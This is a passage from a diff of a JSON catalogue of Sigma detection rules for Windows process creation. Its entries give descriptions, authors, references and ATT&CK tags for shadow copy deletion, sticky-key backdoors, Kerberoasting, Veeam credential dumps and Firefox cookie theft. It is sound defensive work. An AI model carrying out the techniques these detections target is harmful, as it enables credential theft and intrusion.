"https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" + }, + { + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "filename": "proc_creation_win_shadow_copies_access_symlink.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "value": "Shadow Copies Access via Symlink" + }, + { + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "meta": { + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "filename": "proc_creation_win_shadow_copies_creation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", + "value": "Shadow Copies Creation Using Operating Systems Utilities" + }, + { + "description": "Shadow Copies deletion using operating systems utilities", + "meta": { + "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + ], + "filename": "proc_creation_win_shadow_copies_deletion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/Neo23x0/Raccine#the-process", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" + ] + }, + "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "value": "Shadow Copies Deletion Using Operating Systems Utilities" + }, + { + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharpup.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SharpUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" + ] + }, + "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "value": "SharpUp PrivEsc Tool" + }, + { + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "filename": "proc_creation_win_sharp_chisel_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/shantanu561993/SharpChisel", + "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ] + }, + "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "value": "SharpChisel Usage" + }, + { + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "creation_date": "2021/12/17", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "filename": "proc_creation_win_shell_spawn_by_java.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "value": "Shells Spawned by Java" + }, + { + "description": "Detects a suspicious child process of a Windows shell", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "filename": "proc_creation_win_shell_spawn_susp_program.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "value": "Windows Shell Spawning Suspicious Program" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", + "value": "SILENTTRINITY Stager Execution" + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_win_software_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "value": "Detected Windows Software Discovery" + }, + { + "description": "Detect attacker collecting audio via SoundRecorder application.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "filename": "proc_creation_win_soundrec_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", + "value": "Audio Capture via SoundRecorder" + }, + { + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", + "meta": { + "author": "Markus Neis, keepwatch", + "creation_date": "2018/11/14", + "falsepositive": [ + "Administrator Activity" + ], + "filename": "proc_creation_win_spn_enum.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "value": "Possible SPN Enumeration" + }, + { + "description": "Detects dump of credentials in VeeamBackup dbo", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "value": "VeeamBackup Database Credentials Dump" + }, + { + "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", + "meta": { + "author": "frack113", + "creation_date": "2022/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlite_firefox_cookies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ] + }, + "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", + "value": "SQLite Firefox Cookie DB Access" + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "meta": { + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_stickykey_like_backdoor.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ] + }, + "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "value": "Sticky Key Like Backdoor Usage" + }, + { + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/02/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" + ], + "tags": [ + "attack.t1546.008", + "attack.privilege_escalation" + ] + }, + "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "value": "Sticky-Key Backdoor Copy Cmd.exe" + }, + { + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "meta": { + "author": "Austin Songer (@austinsonger)", + "creation_date": "2021/10/21", + "falsepositive": [ + "Legitimate usage of stordiag.exe." + ], + "filename": "proc_creation_win_stordiag_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", + "https://twitter.com/eral4m/status/1451112385041911809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "value": "Execution via stordiag.exe" + }, + { + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_susp_16bit_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", + "value": "Start of NT Virtual DOS Machine" + }, + { + "description": "Detects the use of 3proxy, a tiny free proxy server", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_3proxy_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", + "value": "3Proxy Usage" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Command line parameter combinations that contain all included strings" + ], + "filename": "proc_creation_win_susp_7z.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", + "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" + }, + { + "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" + ], + "filename": "proc_creation_win_susp_7zip_dmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "value": "7Zip Compressing Dump Files" + }, + { + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_local_admin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", + "value": "Add User to Local Administrators" + }, + { + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" + ] + }, + "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "value": "Suspicious Add User to Remote Desktop Users Group" + }, + { + "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_adfind_enumeration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "value": "Suspicious AdFind Enumeration" + }, + { + "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "creation_date": "2021/02/02", + "falsepositive": [ + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_adfind_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", + "value": "AdFind Usage Detection" + }, + { + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_adidnsdump.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", + "value": "Suspicious Execution of Adidnsdump" + }, + { + "description": "Detects the execution of AdvancedRun utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_advancedrun.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" + ], + "tags": "No established tags" + }, + "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "value": "Suspicious AdvancedRun Execution" + }, + { + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" + ], + "tags": "No established tags" + }, + "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", + "value": "Suspicious AdvancedRun Runas Priv User" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" + }, + { + "description": "Detects base64 encoded powershell 'Invoke-' call", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_invoke.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "value": "Suspicious Base64 Encoded Powershell Invoke" + }, + { + "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "value": "Suspicious Encoded Obfuscated LOAD String" + }, + { + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", + "meta": { + "author": "@neu5ron", + "creation_date": "2019/02/07", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_bcdedit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ] + }, + "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "value": "Possible Ransomware or Unauthorized MBR Modifications" + }, + { + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bginfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", + "value": "Application Whitelisting Bypass via Bginfo" + }, + { + "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bitstransfer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", + "value": "Suspicious Bitstransfer via PowerShell" + }, + { + "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2018/08/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_builtin_commands_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" + ], + "tags": 